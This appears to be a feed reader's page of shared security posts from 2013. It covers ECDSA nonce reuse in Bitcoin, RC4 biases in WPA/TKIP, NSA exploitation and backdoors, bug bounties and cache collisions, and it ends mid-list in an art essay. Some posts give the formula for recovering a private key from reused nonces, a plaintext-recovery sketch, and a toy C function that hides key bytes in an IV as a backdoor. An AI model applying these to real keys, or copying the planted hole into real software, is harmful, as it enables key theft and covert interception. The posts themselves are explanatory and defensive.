Shared posts

20 Nov 16:42

Elliptic Curve Cryptography in Practice

by ellipticnews

The recent paper Elliptic Curve Cryptography in Practice by Joppe W. Bos, J. Alex Halderman, Nadia Heninger, Jonathan Moore, Michael Naehrig and Eric Wustrow is well worth reading. The discovery in 2012 of a large number of RSA public keys with common factors showed that public key cryptography can go badly wrong in the real world. This paper reports on a thorough evaluation of deployed ECC systems. Some of them, for example the Austrian e-ID citizen card, are found to have no weaknesses. However, serious issues are discovered with some other systems. In particular, the paper gives evidence that a theft of 59 bitcoins was achieved by an attacker exploiting duplicated nonces in ECDSA signatures. Further issues with Bitcoin are discussed. The paper also reports some potentially serious bugs in TLS implementations in some commercially available devices. The paper does not reveal details of any companies or individuals affected by these issues.
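
As background, here is the standard textbook calculation (not a detail taken from the paper itself) showing why a duplicated nonce is fatal: if the same nonce k is used to sign two message hashes m1 and m2 under the same private key d, the two signatures (r, s1) and (r, s2) share the value r, and anyone who sees both can compute

    k = (m1 - m2) * (s1 - s2)^(-1)  mod n
    d = (s1 * k - m1) * r^(-1)      mod n

recovering the private key d and, in the Bitcoin case, gaining the ability to spend the associated coins.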

— Steven Galbraith


18 Nov 09:20

Plaintext Recovery Attacks Against WPA/TKIP, by Kenneth G. Paterson and Bertram Poettering and Jacob C.N. Schuldt

We conduct an analysis of the RC4 algorithm as it is used in the IEEE WPA/TKIP wireless standard. In that standard, RC4 keys are computed on a per-frame basis, with specific key bytes being set to known values that depend on 2 bytes of the WPA frame counter (called the TSC). We observe very large, TSC-dependent biases in the RC4 keystream when the algorithm is keyed according to the WPA specification. These biases permit us to mount an effective statistical, plaintext-recovering attack in the situation where the same plaintext is encrypted in many different frames (the so-called "broadcast attack" setting). We assess the practical impact of these attacks on WPA/TKIP.
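
To make the "broadcast attack" setting concrete, here is a minimal sketch of the general statistical idea (my illustration, not the authors' code), assuming the attacker has measured an empirical keystream-byte distribution for one position offline and has collected the ciphertext byte at that position from many frames that encrypt the same plaintext:

    /* Maximum-likelihood recovery of a single plaintext byte.
     * dist[256]: measured probability of each keystream byte value at this
     *            position (assumed smoothed so that no entry is zero).
     * c[0..n-1]: ciphertext bytes at this position from n frames that all
     *            encrypt the same plaintext byte. */
    #include <math.h>
    #include <stddef.h>

    int recover_plaintext_byte(const double dist[256],
                               const unsigned char *c, size_t n)
    {
        int best = 0;
        double best_score = -INFINITY;
        for (int p = 0; p < 256; p++) {        /* candidate plaintext byte */
            double score = 0.0;
            for (size_t i = 0; i < n; i++)
                score += log(dist[c[i] ^ p]);  /* keystream byte implied by p */
            if (score > best_score) {
                best_score = score;
                best = p;
            }
        }
        return best;
    }

The more biased the keystream distribution and the more frames available, the more reliably the true plaintext byte wins.
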
14 Nov 09:58

Elliptic Curve Cryptography in Practice, by Joppe W. Bos and J. Alex Halderman and Nadia Heninger and Jonathan Moore and Michael Naehrig and Eric Wustrow

In this paper, we perform a review of elliptic curve cryptography (ECC), as it is used in practice today, in order to reveal unique mistakes and vulnerabilities that arise in implementations of ECC. We study four popular protocols that make use of this type of public-key cryptography: Bitcoin, secure shell (SSH), transport layer security (TLS), and the Austrian e-ID card. We are pleased to observe that about 1 in 10 systems support ECC across the TLS and SSH protocols. However, we find that despite the high stakes of money, access and resources protected by ECC, implementations suffer from vulnerabilities similar to those that plague previous cryptographic systems.
11 Nov 16:42

Dan Geer Explains the Government Surveillance Mentality

by Bruce Schneier

This talk by Dan Geer explains the NSA mindset of "collect everything":

I previously worked for a data protection company. Our product was, and I believe still is, the most thorough on the market. By "thorough" I mean the dictionary definition, "careful about doing something in an accurate and exact way." To this end, installing our product instrumented every system call on the target machine. Data did not and could not move in any sense of the word "move" without detection. Every data operation was caught and monitored. It was total surveillance data protection. Its customers were companies that don't accept half-measures. What made this product stick out was that very thoroughness, but here is the point: Unless you fully instrument your data handling, it is not possible for you to say what did not happen. With total surveillance, and total surveillance alone, it is possible to treat the absence of evidence as the evidence of absence. Only when you know everything that *did* happen with your data can you say what did *not* happen with your data.

The alternative to total surveillance of data handling is to answer more narrow questions, questions like "Can the user steal data with a USB stick?" or "Does this outbound e-mail have a Social Security Number in it?" Answering direct questions is exactly what a defensive mindset says you must do, and that is "never make the same mistake twice." In other words, if someone has lost data because of misuse of some facility on the computer, then you either disable that facility or you wrap it in some kind of perimeter. Lather, rinse, and repeat. This extends all the way to such trivial matters as timer-based screen locking.

The difficulty with the defensive mindset is that it leaves in place the fundamental strategic asymmetry of cybersecurity, namely that while the workfactor for the offender is the price of finding a new method of attack, the workfactor for the defender is the cumulative cost of forever defending against all attack methods yet discovered. Over time, the curve for the cost of finding a new attack and the curve for the cost of defending against all attacks to date cross. Once those curves cross, the offender never has to worry about being out of the money. I believe that that crossing occurred some time ago.

The total surveillance strategy is, to my mind, an offensive strategy used for defensive purposes. It says "I don't know what the opposition is going to try, so everything is forbidden unless we know it is good." In that sense, it is like whitelisting applications. Taking either the application whitelisting or the total data surveillance approach is saying "That which is not permitted is forbidden."

[...]

We all know the truism, that knowledge is power. We all know that there is a subtle yet important distinction between information and knowledge. We all know that a negative declaration like "X did not happen" can only be proven true if you have the enumeration of *everything* that did happen and can show that X is not in it. We all know that when a President says "Never again" he is asking for the kind of outcome for which proving a negative, lots of negatives, is categorically essential. Proving a negative requires omniscience. Omniscience requires god-like powers.

The whole essay is well worth reading.

07 Nov 19:01

Microsoft, Facebook: We'll pay cash if you can poke a hole in the INTERNET

by Iain Thomson

New bug-hunting program to shore up security across the whole damn web

While Facebook and Microsoft already run security bug bounty programs of their own, the two companies are now working together to reward researchers who can find flaws in some of the underlying technologies behind online communications.…

07 Nov 19:01

New Internet Bug Bounty holds companies accountable, protects hackers

Security high-hats from Microsoft, Facebook and others have launched HackerOne: an open call for hackers to submit Internet bugs for cash. Hackers can remain anonymous, while all vulns are made public.
07 Nov 16:33

Risk-Based Authentication

by Bruce Schneier

I like this idea of giving each individual login attempt a risk score, based on the characteristics of the attempt:

The risk score estimates the risk associated with a log-in attempt based on a user's typical log-in and usage profile, taking into account their device and geographic location, the system they're trying to access, the time of day they typically log in, their device's IP address, and even their typing speed. An employee logging into a CRM system using the same laptop, at roughly the same time of day, from the same location and IP address will have a low risk score. By contrast, an attempt to access a finance system from a tablet at night in Bali could potentially yield an elevated risk score.

Risk thresholds for individual systems are established based on the sensitivity of the information they store and the impact if the system were breached. Systems housing confidential financial data, for example, will have a low risk threshold.

If the risk score for a user's access attempt exceeds the system's risk threshold, authentication controls are automatically elevated, and the user may be required to provide a higher level of authentication, such as a PIN or token. If the risk score is too high, it may be rejected outright.
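
A minimal sketch of how such a scheme might fit together (my illustration, not any vendor's product; the signals, weights and thresholds are invented):

    #include <stdbool.h>

    struct login_attempt {
        bool known_device;      /* same laptop/phone the user normally uses    */
        bool usual_location;    /* geolocation matches the user's profile      */
        bool usual_ip;          /* IP address seen before for this user        */
        bool usual_hours;       /* within the user's normal login window       */
        bool typing_matches;    /* keystroke dynamics match the stored profile */
    };

    enum auth_decision { ALLOW, STEP_UP, REJECT };

    static int risk_score(const struct login_attempt *a)
    {
        int score = 0;          /* 0 = typical login, 100 = everything is off */
        if (!a->known_device)   score += 30;
        if (!a->usual_location) score += 25;
        if (!a->usual_ip)       score += 15;
        if (!a->usual_hours)    score += 10;
        if (!a->typing_matches) score += 20;
        return score;
    }

    /* sensitive systems get a low threshold, e.g. finance = 20, CRM = 50 */
    enum auth_decision decide(const struct login_attempt *a, int threshold)
    {
        int score = risk_score(a);
        if (score <= threshold)      return ALLOW;
        if (score <= threshold + 40) return STEP_UP;   /* ask for a PIN or token */
        return REJECT;
    }

In a real deployment the weights would be learned from historical login data rather than hand-picked.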

06 Nov 11:30

The NSA's New Risk Analysis

by schneier

As I recently reported in the Guardian, the NSA has secret servers on the Internet that hack into other computers, codename FOXACID. These servers provide an excellent demonstration of how the NSA approaches risk management, and expose flaws in how the agency thinks about the secrecy of its own programs.

Here are the FOXACID basics: By the time the NSA tricks a target into visiting one of those servers, it already knows exactly who that target is, who wants him eavesdropped on, and the expected value of the data it hopes to receive. Based on that information, the server can automatically decide what exploit to serve the target, taking into account the risks associated with attacking the target, as well as the benefits of a successful attack. According to a top-secret operational procedures manual provided by Edward Snowden, an exploit named Validator might be the default, but the NSA has a variety of options. The documentation mentions United Rake, Peddle Cheap, Packet Wrench, and Beach Head -- all delivered from a FOXACID subsystem called Ferret Cannon. Oh how I love some of these code names. (On the other hand, EGOTISTICALGIRAFFE has to be the dumbest code name ever.)

Snowden explained this to Guardian reporter Glenn Greenwald in Hong Kong. If the target is a high-value one, FOXACID might run a rare zero-day exploit that it developed or purchased. If the target is technically sophisticated, FOXACID might decide that there's too much chance for discovery, and keeping the zero-day exploit a secret is more important. If the target is a low-value one, FOXACID might run an exploit that's less valuable. If the target is low-value and technically sophisticated, FOXACID might even run an already-known vulnerability.

We know that the NSA receives advance warning from Microsoft of vulnerabilities that will soon be patched; there's not much of a loss if an exploit based on that vulnerability is discovered. FOXACID has tiers of exploits it can run, and uses a complicated trade-off system to determine which one to run against any particular target.
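
Purely as an illustration of what such a tiered trade-off might look like in the abstract (nothing below comes from the leaked documents; the tiers, inputs and cut-offs are invented):

    /* Toy decision logic: the scarcer the exploit, the higher the required
     * target value and the lower the tolerated chance of discovery. */
    enum exploit_tier { KNOWN_VULN, COMMODITY_EXPLOIT, RARE_ZERO_DAY };

    enum exploit_tier choose_exploit(int target_value,          /* 0..10 */
                                     int target_sophistication) /* 0..10 */
    {
        if (target_value >= 8 && target_sophistication <= 5)
            return RARE_ZERO_DAY;      /* high value, low risk of discovery */
        if (target_value >= 4)
            return COMMODITY_EXPLOIT;  /* worthwhile, but not worth a 0-day */
        return KNOWN_VULN;             /* low value: risk nothing scarce    */
    }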

This cost-benefit analysis doesn't end at successful exploitation. According to Snowden, the TAO -- that's Tailored Access Operations -- operators running the FOXACID system have a detailed flowchart, with tons of rules about when to stop. If something doesn't work, stop. If they detect a PSP, a personal security product, stop. If anything goes weird, stop. This is how the NSA avoids detection, and also how it takes mid-level computer operators and turns them into what they call "cyberwarriors." It's not that they're skilled hackers, it's that the procedures do the work for them.

And they're super cautious about what they do.

While the NSA excels at performing this cost-benefit analysis at the tactical level, it's far less competent at doing the same thing at the policy level. The organization seems to be good enough at assessing the risk of discovery -- for example, if the target of an intelligence-gathering effort discovers that effort -- but to have completely ignored the risks of those efforts becoming front-page news.

It's not just in the U.S., where newspapers are heavy with reports of the NSA spying on every Verizon customer, spying on domestic e-mail users, and secretly working to cripple commercial cryptography systems, but also around the world, most notably in Brazil, Belgium, and the European Union. All of these operations have caused significant blowback -- for the NSA, for the U.S., and for the Internet as a whole.

The NSA spent decades operating in almost complete secrecy, but those days are over. As the corporate world learned years ago, secrets are hard to keep in the information age, and openness is a safer strategy. The tendency to classify everything means that the NSA won't be able to sort what really needs to remain secret from everything else. The younger generation is more used to radical transparency than secrecy, and is less invested in the national security state. And whistleblowing is the civil disobedience of our time.

At this point, the NSA has to assume that all of its operations will become public, probably sooner than it would like. It has to start taking that into account when weighing the costs and benefits of those operations. And it now has to be just as cautious about new eavesdropping operations as it is about using FOXACID exploits against users.

This essay previously appeared in the Atlantic.

06 Nov 11:24

Defending Against Crypto Backdoors

by schneier

We already know the NSA wants to eavesdrop on the Internet. It has secret agreements with telcos to get direct access to bulk Internet traffic. It has massive systems like TUMULT, TURMOIL, and TURBULENCE to sift through it all. And it can identify ciphertext -- encrypted information -- and figure out which programs could have created it.

But what the NSA wants is to be able to read that encrypted information in as close to real-time as possible. It wants backdoors, just like the cybercriminals and less benevolent governments do.

And we have to figure out how to make it harder for them, or anyone else, to insert those backdoors.

How the NSA Gets Its Backdoors

The FBI tried to get backdoor access embedded in an AT&T secure telephone system in the mid-1990s. The Clipper Chip included something called a LEAF: a Law Enforcement Access Field. It was the key used to encrypt the phone conversation, itself encrypted in a special key known to the FBI, and it was transmitted along with the phone conversation. An FBI eavesdropper could intercept the LEAF and decrypt it, then use the data to eavesdrop on the phone call.
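
A minimal sketch of the escrow idea described above (field names and sizes are simplified; this is not the actual Clipper/EES frame format):

    /* The session key that encrypts the conversation is itself encrypted
     * under a key held by law enforcement and shipped alongside the traffic,
     * so an authorized eavesdropper can unwrap it and decrypt the call. */
    struct clipper_frame {
        unsigned char leaf[16];      /* session key wrapped under the
                                        law-enforcement escrow key */
        unsigned char ciphertext[];  /* the conversation, encrypted under
                                        the session key */
    };

An FBI eavesdropper who holds the escrow key recovers the session key from the leaf field and then decrypts the ciphertext.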

But the Clipper Chip faced severe backlash, and became defunct a few years after being announced.

Having lost that public battle, the NSA decided to get its backdoors through subterfuge: by asking nicely, pressuring, threatening, bribing, or mandating through secret order. The general name for this program is BULLRUN.

Defending against these attacks is difficult. We know from subliminal channel and kleptography research that it's pretty much impossible to guarantee that a complex piece of software isn't leaking secret information. We know from Ken Thompson's famous talk on "trusting trust" (first delivered in the ACM Turing Award Lectures) that you can never be totally sure if there's a security flaw in your software.

Since BULLRUN became public last month, the security community has been examining security flaws discovered over the past several years, looking for signs of deliberate tampering. The Debian random number flaw was probably not deliberate, but the 2003 Linux security vulnerability probably was. The DUAL_EC_DRBG random number generator may or may not have been a backdoor. The SSL 2.0 flaw was probably an honest mistake. The GSM A5/1 encryption algorithm was almost certainly deliberately weakened. All the common RSA moduli out there in the wild: we don't know. Microsoft's _NSAKEY looks like a smoking gun, but honestly, we don't know.

How the NSA Designs Backdoors

While a separate program that sends our data to some IP address somewhere is certainly how any hacker -- from the lowliest script kiddie up to the NSA -- spies on our computers, it's too labor-intensive to work in the general case.

For government eavesdroppers like the NSA, subtlety is critical. In particular, three characteristics are important:

  • Low discoverability. The less the backdoor affects the normal operations of the program, the better. Ideally, it shouldn't affect functionality at all. The smaller the backdoor is, the better. Ideally, it should just look like normal functional code. As a blatant example, an email encryption backdoor that appends a plaintext copy to the encrypted copy is much less desirable than a backdoor that reuses most of the key bits in a public IV (initialization vector).

  • High deniability. If discovered, the backdoor should look like a mistake. It could be a single opcode change. Or maybe a "mistyped" constant. Or "accidentally" reusing a single-use key multiple times. This is the main reason I am skeptical about _NSAKEY as a deliberate backdoor, and why so many people don't believe the DUAL_EC_DRBG backdoor is real: they're both too obvious.

  • Minimal conspiracy. The more people who know about the backdoor, the more likely the secret is to get out. So any good backdoor should be known to very few people. That's why the recently described potential vulnerability in Intel's random number generator worries me so much; one person could make this change during mask generation, and no one else would know.

These characteristics imply several things:

  • A closed-source system is safer to subvert, because an open-source system comes with a greater risk of that subversion being discovered. On the other hand, a big open-source system with a lot of developers and sloppy version control is easier to subvert.

  • If a software system only has to interoperate with itself, then it is easier to subvert. For example, a closed VPN encryption system only has to interoperate with other instances of that same proprietary system. This is easier to subvert than an industry-wide VPN standard that has to interoperate with equipment from other vendors.

  • A commercial software system is easier to subvert, because the profit motive provides a strong incentive for the company to go along with the NSA's requests.

  • Protocols developed by large open standards bodies are harder to influence, because a lot of eyes are paying attention. Systems designed by closed standards bodies are easier to influence, especially if the people involved in the standards don't really understand security.

  • Systems that send seemingly random information in the clear are easier to subvert. One of the most effective ways of subverting a system is by leaking key information -- recall the LEAF -- and modifying random nonces or header information is the easiest way to do that.
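
An invented example of the kind of leak this last point describes (not any real backdoor): a "random-looking" IV whose second half actually carries key bytes, readable by anyone who knows the masking constant.

    #include <stddef.h>

    static const unsigned char MASK[8] = {   /* known only to the attacker */
        0x3a, 0x91, 0x5e, 0xc7, 0x08, 0x6d, 0xb2, 0xf4
    };

    void make_backdoored_iv(unsigned char iv[16],
                            const unsigned char key[16],
                            unsigned long long msg_no)
    {
        /* first half: an honest-looking message counter */
        for (size_t i = 0; i < 8; i++)
            iv[i] = (unsigned char)(msg_no >> (8 * i));
        /* second half: half of the key, masked so it "looks" random; a more
           careful backdoor would also vary these bytes per message to hide
           the repetition */
        for (size_t i = 0; i < 8; i++)
            iv[8 + i] = key[i] ^ MASK[i];
    }
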

Design Strategies for Defending against Backdoors

With these principles in mind, we can list design strategies. None of them is foolproof, but they are all useful. I'm sure there's more; this list isn't meant to be exhaustive, nor the final word on the topic. It's simply a starting place for discussion. But it won't work unless customers start demanding software with this sort of transparency.

  • Vendors should make their encryption code public, including the protocol specifications. This will allow others to examine the code for vulnerabilities. It's true we won't know for sure if the code we're seeing is the code that's actually used in the application, but surreptitious substitution is hard to do, forces the company to outright lie, and increases the number of people required for the conspiracy to work.

  • The community should create independent compatible versions of encryption systems, to verify they are operating properly. I envision companies paying for these independent versions, and universities accepting this sort of work as good practice for their students. And yes, I know this can be very hard in practice.

  • There should be no master secrets. These are just too vulnerable.

  • All random number generators should conform to published and accepted standards. Breaking the random number generator is the easiest difficult-to-detect method of subverting an encryption system. A corollary: we need better published and accepted RNG standards.

  • Encryption protocols should be designed so as not to leak any random information. Nonces should be considered part of the key, or be public, predictable counters, if possible. Again, the goal is to make it harder to subtly leak key bits in this information.
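
A sketch of what that last recommendation can look like in code (an illustrative construction, not taken from the essay): the nonce is derived entirely from state the protocol already carries, so a reviewer can see at a glance that it has no free bits in which to hide key material.

    void make_counter_nonce(unsigned char nonce[12],
                            unsigned int sender_id,
                            unsigned long long msg_no)
    {
        /* 4 bytes of sender identifier + 8 bytes of message counter:
           unique per message, fully predictable, nothing left to leak */
        for (int i = 0; i < 4; i++)
            nonce[i] = (unsigned char)(sender_id >> (8 * i));
        for (int i = 0; i < 8; i++)
            nonce[4 + i] = (unsigned char)(msg_no >> (8 * i));
    }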

This is a hard problem. We don't have any technical controls that protect users from the authors of their software.

And the current state of software makes the problem even harder: Modern apps chatter endlessly on the Internet, providing noise and cover for covert communications. Feature bloat provides a greater "attack surface" for anyone wanting to install a backdoor.

In general, what we need is assurance: methodologies for ensuring that a piece of software does what it's supposed to do and nothing more. Unfortunately, we're terrible at this. Even worse, there's not a lot of practical research in this area -- and it's hurting us badly right now.

Yes, we need legal prohibitions against the NSA trying to subvert authors and deliberately weaken cryptography. But this isn't just about the NSA, and legal controls won't protect against those who don't follow the law and ignore international agreements. We need to make their job harder by increasing their risk of discovery. Against a risk-averse adversary, it might be good enough.

This essay previously appeared on Wired.com.

EDITED TO ADD: I am looking for other examples of known or plausible instances of intentional vulnerabilities for a paper I am writing on this topic. If you can think of an example, please post a description and reference in the comments below. Please explain why you think the vulnerability could be intentional. Thank you.

05 Nov 18:52

Bounty Evolution: $100,000 for New Mitigation Bypass Techniques Wanted Dead or Alive

by BlueHat1

Those who know me personally or follow me on Twitter are familiar with my obsession with karaoke. I do it as often as I can rope people into going with me, never forcing anyone to sing, though invariably everyone does – or at least sings from the sidelines to the songs they know. One of my all-time favorite songs is Bon Jovi’s Wanted Dead or Alive, and it’s the song in my head as I write this post. By the end, I hope to have a few more people singing along. Go ahead and load it into the playlist as you read on.

Today, Microsoft is announcing the first evolution of its bounty programs, first announced in June of 2013. We are expanding the pool of talent who can participate and submit novel mitigation bypass techniques and defensive ideas to include responders and forensic experts who find active attacks in the wild. That means more people can “sing along” to earn big bounty payouts than ever before.

Today’s news means we are going from accepting entries from only a handful of individuals capable of inventing new mitigation bypass techniques on their own, to potentially thousands of individuals or organizations who find attacks in the wild. Now, both finders and discoverers can turn in new techniques for $100,000.

Our platform-wide defenses, or mitigations, are a kind of shield that protects the entire operating system and all the applications running on it. Individual bugs are like arrows.  The stronger the shield, the less likely any individual bug or arrow can get through. Learning about “ways around the shield,” or new mitigation bypass techniques, is much more valuable than learning about individual bugs because insight into exploit techniques can help us defend against entire classes of attack as opposed to a single bug – hence, we are willing to pay $100,000 for these rare new techniques.

Building upon the success of our strategic bounty programs, Microsoft is evolving the bounty landscape to the benefit of our customers. The bounty programs we have created are designed to change the dynamics and the economics of the current vulnerability market. We currently do this in a few ways:

  1. Offering bounties for bugs when other buyers typically are not buying them (e.g. during the preview/beta period) allows Microsoft to get a number of critical bugs out of the market before they are widely traded in grey or black markets and subsequently used to attack customers.

  2. Offering researchers a $100,000 bounty to teach us new mitigation bypass techniques enables us to build better defenses into our products faster and to provide workarounds and mitigations through tools such as EMET.

  3. Evolving our bounty programs to include responders and forensic experts, who can turn in techniques that are being used in active attacks, enables us to work on building better defenses into our products. We will work whenever possible with our MAPP program and engage our community network of defenders to help mitigate these attacks more rapidly.

In this new expansion of Microsoft’s bounty programs, organizations and individuals are eligible to submit Proof-of-Concept code and technical analysis of exploits they find in active use in the wild for our standard bounty amount of up to $100,000. Participants are also eligible for up to an additional $50,000 if they submit a qualifying defense idea. The submission criteria for both programs are similar – but the source may be different.

To participate in the expanded bounty program, organizations must pre-register with us before turning in a submission by emailing us at doa [at] Microsoft [dot] com. After you pre-register and sign an agreement, we’ll accept an entry consisting of a technical write-up and proof-of-concept code for bounty consideration.

We want to learn about these rare new exploitation techniques as early as possible, ideally before they are used, but we’ll pay for them even if they are currently being used in targeted attacks if the attack technique is new – because we want them dead or alive.

This evolution of our bounty programs is designed to further disrupt the vulnerability and exploit markets. Currently, black markets pay high prices for vulnerabilities and exploits based on factors that include exclusivity and longevity of usefulness before a vendor discovers and mitigates it.  By expanding our bounty program, Microsoft is cutting down the time that exploits and vulnerabilities purchased on the black market remain useful, especially for targeted attacks that rely on stealthy exploitation without discovery.

We shall see how the song plays out, but I for one am excited for more singers to step up to the microphone, or to sing out from the sidelines.

 

Katie Moussouris

Senior Security Strategist and karaoke MC

Microsoft Security Response Center

http://twitter.com/k8em0
(that’s a zero)

05 Nov 09:29

Outsourced Symmetric Private Information Retrieval, by Stanislaw Jarecki and Charanjit Jutla and Hugo Krawczyk and Marcel Rosu and Michael Steiner

In the setting of searchable symmetric encryption (SSE), a data owner D outsources a database (or document/file collection) to a remote server E in encrypted form such that D can later search the collection at E while hiding information about the database and queries from E. Leakage to E is to be confined to well-defined forms of data-access and query patterns while preventing disclosure of explicit data and query plaintext values. Recently, Cash et al presented a protocol, OXT, which can run arbitrary Boolean queries in the SSE setting and which is remarkably efficient even for very large databases. In this paper we investigate a richer setting in which the data owner D outsources its data to a server E but D is now interested to allow clients (third parties) to search the database such that clients learn the information D authorizes them to learn but nothing else while E still does not learn about the data or queried values as in the basic SSE setting. Furthermore, motivated by a wide range of applications, we extend this model and requirements to a setting where, similarly to private information retrieval, the client's queried values need to be hidden also from the data owner D even though the latter still needs to authorize the query. Finally, we consider the scenario in which authorization can be enforced by the data owner D without D learning the policy, a setting that arises in court-issued search warrants. We extend the OXT protocol of Cash et al to support arbitrary Boolean queries in all of the above models while withstanding adversarial non-colluding servers (D and E) and arbitrarily malicious clients, and while preserving the remarkable performance of the protocol.
01 Nov 08:53

CPU cache collisions in the context of performance

by jarek

This article discusses some potential performance issues caused by CPU cache collisions.

In normal scenarios cache collisions don’t pose a problem; it is usually only in specific, high-speed
applications that they incur noticeable performance penalties, so the techniques described here
should be considered a “last mile” effort.
As an example, I will use my laptop’s CPU, an Intel Core i5 at 1.7 GHz, which has a 32kB 8-way L1 data cache per core.

  • CPUs have caches organized in cachelines. For Intel and AMD, cachelines are 64 bytes long.
    When the CPU needs to reach a byte located in memory at address 100, the whole chunk from
    addresses 64-127 is pulled into the cache. Since my example CPU has a 32kB L1 data cache
    per core, this means 512 such cachelines. The 64-byte size also means that the six
    least significant bits of the address index the byte within the cacheline:
    address bits:    |       0 - 5      |       6 - ...     |
                     | cacheline offset |
    
  • Cachelines are organized in buckets. “8-way” means that each bucket holds 8 cachelines.
    Therefore my CPU’s L1 data cache has 512 cachelines kept in 64 buckets. In order to address those 64 buckets,
    the next 6 bits of the address are used; the full address resolution within this L1 cache goes as follows:
    address bits:    |       0 - 5      |      6 - 11     |                12 - ...             |
                     | cacheline offset | bucket selector | cacheline identifier within bucket  |
    
  • Crucial to understand here is that, for this CPU, data items whose addresses differ by a
    multiple of 4096 bytes (i.e. addresses identical in their lowest 12 bits) always end up in
    the same bucket. So many data chunks spaced N x 4096 bytes apart, processed in parallel,
    can cause excessive evictions of cachelines from that bucket, thereby defeating the benefits
    of the L1 cache (see the sketch after this list).
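
A minimal sketch of the mapping just described (my illustration for this particular 32 kB, 8-way, 64-byte-line cache; the constants change with cache geometry):

    #include <stdio.h>
    #include <stdint.h>

    /* Which of the 64 L1 buckets (sets) an address falls into:
       drop the 6 cacheline-offset bits, keep the next 6 bits. */
    static unsigned l1_bucket(uintptr_t addr)
    {
        return (unsigned)((addr >> 6) & 63);
    }

    int main(void)
    {
        /* addresses spaced 4096 bytes apart all compete for the same
           8 cacheline slots of a single bucket */
        for (int n = 0; n < 4; n++) {
            uintptr_t addr = 0x100000 + (uintptr_t)n * 4096;
            printf("address %#lx -> bucket %u\n",
                   (unsigned long)addr, l1_bucket(addr));
        }
        return 0;   /* prints "bucket 0" four times */
    }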

To test the performance degradation I wrote a test C program (full C source here) that generates
a number of vectors of pseudo-random integers, sums them up in a typical parallel-optimized way,
and estimates the resulting speed. The program takes a couple of parameters from the command line
so that various CPUs and scenarios can be tested.
Here are the results of three test runs on my example CPU:

  1. 100000 iterations, 30 vectors, 1000 integers each, aligned to 1010 integers = 2396 MOP/s
  2. 100000 iterations, 30 vectors, 1000 integers each, aligned to 1024 integers = 890 MOP/s
  3. 100000 iterations, 30 vectors, 1000 integers each, aligned to 1030 integers = 2415 MOP/s

In this CPU, the L1 cache has 4 cycles of latency and the L2 cache has 12, hence the performance
dropped to almost 1/3 when the alignment hit the N x 4096 condition: the CPU pretty much fell
back from L1 to L2. While this is a synthetic example and real-life applications may not be
affected this much, I’ve seen applications lose 30-40% to this single factor.

Parting remarks:

  • You may need to take into consideration the structure of the cache, not only its size; as in this case,
    even data chunked into pieces small enough to fit into L1 can still fail to take full advantage of it.
  • The issue cannot be solved by rewriting the critical-section logic in C/C++/assembly or any other
    “super-fast language of your choice”; this behavior is dictated by hardware specifics.
  • Developers’ habit of aligning to even boundaries, especially to page boundaries,
    can work against you.
  • Padding can help break out of the performance drop (see the sketch after this list).
  • Sometimes the easiest workaround is a platform change, e.g. switching from Intel to AMD
    or the other way around. Keep in mind, though, that this doesn’t really solve the issue; different platforms
    just manifest it for different data layouts.
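
A sketch of the padding workaround mentioned in the remarks above (my illustration; the vector length matches the test runs): give each vector a stride that is not a multiple of the 4096-byte critical stride, so concurrently processed vectors land in different buckets.

    #include <stdlib.h>

    #define VEC_LEN 1000            /* integers actually used per vector     */
    #define PAD     16              /* a few throw-away integers of padding  */
    #define STRIDE  (VEC_LEN + PAD) /* 1016 ints = 4064 bytes, deliberately
                                       not a multiple of 4096                */

    /* vector i starts at base + i * STRIDE rather than at a page-aligned
       offset, so corresponding elements of different vectors map to
       different cache buckets */
    int *alloc_vectors(int count)
    {
        return malloc((size_t)count * STRIDE * sizeof(int));
    }
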
31 Oct 11:35

Building Security in Maturity Model Includes Bug-Bounty Programs

The fifth iteration of this best-practices security framework adds a critical new component that few organizations have today.
31 Oct 10:18

How to deal with emergencies better

by Ross Anderson

Britain has just been hit by a storm; two people have been killed by falling trees, and one swept out to sea. The rail network is in chaos and over 100,000 homes lost electric power. What can security engineering teach about such events?

Risk communication could be very much better. The storm had been forecast for several days but the instructions and advice from authority have almost all been framed in vague and general terms. Our research on browser warnings shows that people mostly ignore vague warnings (“Warning – visiting this web site may harm your computer!”) but pay much more attention to concrete ones (such as “The site you are about to visit has been confirmed to contain software that poses a significant risk to you, with no tangible benefit. It would try to infect your computer with malware designed to steal your bank account and credit card details in order to defraud you”). In fact, making warnings more concrete is the only thing that works here – nudge favourites such as appealing to social norms, or authority, or even putting a cartoon face on the page to activate social cognition, don’t seem to have a significant effect in this context.

So how should the Met Office and the emergency services deal with the next storm?

While driving to work I heard a council official telling people not to take their own saws to fallen tree branches, but wait for council crews. A left-leaning listener might interpret this as a lawyerly “Right, I’ve covered my backside by saying that” while a conservative-leaning one might hear a trade unionist line “Don’t you dare take bread out of the mouths of the workers!” Government spokespersons score pretty low on most trust scales and people tend to project on them the lowest motives of whichever party they support least. It would surely have been better to say “If a road is blocked by a tree, just call us and we’ll send a crew round. If you absolutely can’t wait, take care! There are accidents every year when someone cuts halfway through a branch, and it cracks and the rest of the tree falls on them.”

Similarly, in the run-up to the storm, the weather forecaster might usefully say “We had three people unfortunately killed last time in 2013, and 30 killed in the big storm of 1987. Most fatal injuries are from falling trees, then flying debris, then people being washed out to sea. So stay at home if you can. If you really must go out, keep your eyes open, so you can duck if something is blown your way. And don’t stand right on the seafront to admire the waves. Twenty-foot waves can be awesome, but every so often a forty-foot one comes along. So keep your distance.”

A useful way of thinking about it might be this: what advice would you yourself heed if it came from the politician you trust the least? You won’t buy any of his argument, but you may well accept a reminder of a fact that you knew already.

26 Oct 14:50

Art as Therapy: Alain de Botton on the 7 Psychological Functions of Art

by Maria Popova

“Art holds out the promise of inner wholeness.”

The question of what art is has occupied humanity since the dawn of recorded history. For Tolstoy, the purpose of art was to provide a bridge of empathy between us and others, and for Anaïs Nin, a way to exorcise our emotional excess. But the highest achievement of art might be something that reconciles the two: a channel of empathy into our own psychology that lets us both exorcise and better understand our emotions — in other words, a form of therapy.

In Art as Therapy (public library), philosopher Alain de Botton — who has previously examined such diverse and provocative subjects as why work doesn’t work, what education and the arts can learn from religion, and how to think more about sex — teams up with art historian John Armstrong to examine art’s most intimate purpose: its ability to mediate our psychological shortcomings and assuage our anxieties about imperfection. Their basic proposition is that, far more than mere aesthetic indulgence, art is a tool — a tool that serves a rather complex yet straightforwardly important purpose in our existence:

Like other tools, art has the power to extend our capacities beyond those that nature has originally endowed us with. Art compensates us for certain inborn weaknesses, in this case of the mind rather than the body, weaknesses that we can refer to as psychological frailties.

De Botton and Armstrong go on to outline the seven core psychological functions of art:

1. REMEMBERING

